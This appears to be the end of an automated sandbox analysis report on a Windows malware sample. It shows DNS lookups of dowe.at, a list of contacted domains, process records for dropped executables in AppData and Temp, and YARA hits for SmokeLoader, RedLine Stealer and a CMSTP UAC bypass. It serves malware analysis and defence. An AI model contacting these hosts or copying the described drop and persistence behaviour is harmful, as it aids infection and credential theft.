                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:58.053072929 CET8.8.8.8192.168.2.60x9fa9No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 175.120.254.9 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 187.212.179.75 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 200.46.66.71 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 123.213.233.194 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 109.102.255.230 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 201.124.230.1 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 37.34.248.24 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:01.541763067 CET | 8.8.8.8 | 192.168.2.6 | 0xcd8f | No error (0) | dowe.at | 37.234.251.221 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 211.59.14.90 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 175.120.254.9 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 187.212.179.75 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 200.46.66.71 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 123.213.233.194 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 109.102.255.230 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 201.124.230.1 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 37.34.248.24 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:03.497956991 CET | 8.8.8.8 | 192.168.2.6 | 0x37f4 | No error (0) | dowe.at | 37.234.251.221 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 211.59.14.90 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 175.120.254.9 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 187.212.179.75 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 200.46.66.71 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 123.213.233.194 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 109.102.255.230 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 201.124.230.1 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 37.34.248.24 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:05.265032053 CET | 8.8.8.8 | 192.168.2.6 | 0xc889 | No error (0) | dowe.at | 37.234.251.221 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 200.46.66.71 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 123.213.233.194 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 109.102.255.230 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 201.124.230.1 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 211.171.233.129 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 37.34.248.24 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 37.234.251.221 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 211.59.14.90 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 175.120.254.9 | A (IP address) | IN (0x0001) | false
                    Nov 30, 2022 00:12:07.953203917 CET | 8.8.8.8 | 192.168.2.6 | 0x9ea3 | No error (0) | dowe.at | 187.212.179.75 | A (IP address) | IN (0x0001) | false
                    • thepokeway.nl
                    • tajcoxqjmd.com
                      • dowe.at
                    • owxfgf.net
                    • dqkjujneki.com
                    • yfupv.net
                    • lawtvrqx.org
                    • 123.253.32.170
                    • frwum.com
                    • ifardcruc.org
                    • gbbshbjmpq.com
                    • dkguxo.org
                    • frdxrq.org
                    • plraoc.net
                    • panajd.com
                    • queeh.org
                    • lvqyks.com
                    • oidcj.com
                    • ljwdjes.org
                    • bajxyhac.net
                    • fbxsgv.net
                    • xjvagowrnc.org
                    • ueuounaic.org
                    • vhxqowscaf.net
                    • nqdpmu.com
                    • nxslssk.org
                    • rbdses.com
                    • jxvmoh.net
                    • hlixtq.net
                    • bymgj.net
                    • jviyq.org
                    • papeicwkil.net
                    • csplko.com
                    • ecwfh.net
                    • avfvrfo.net
                    • ouqhut.net
                    • amjtlofw.net
                    • mrgphm.org


                    Target ID:0
                    Start time:00:10:00
                    Start date:30/11/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:149504 bytes
                    MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:1
                    Start time:00:10:07
                    Start date:30/11/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff647860000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high

                    Target ID:9
                    Start time:00:10:59
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Roaming\dfhwrav
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\dfhwrav
                    Imagebase:0x400000
                    File size:149504 bytes
                    MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:10
                    Start time:00:11:16
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\ADCA.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ADCA.exe
                    Imagebase:0x400000
                    File size:3776000 bytes
                    MD5 hash:2479739C5D062ECB325147623241F007
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:13
                    Start time:00:11:36
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                    Imagebase:0x1b0000
                    File size:61952 bytes
                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:Borland Delphi
                    Reputation:high

                    Target ID:16
                    Start time:00:11:39
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Imagebase:0x400000
                    File size:478208 bytes
                    MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:19
                    Start time:00:11:48
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                    Imagebase:0x10e0000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:22
                    Start time:00:11:52
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\5AF.exe"
                    Imagebase:0x400000
                    File size:478208 bytes
                    MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:23
                    Start time:00:12:04
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                    Imagebase:0x10e0000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    No disassembly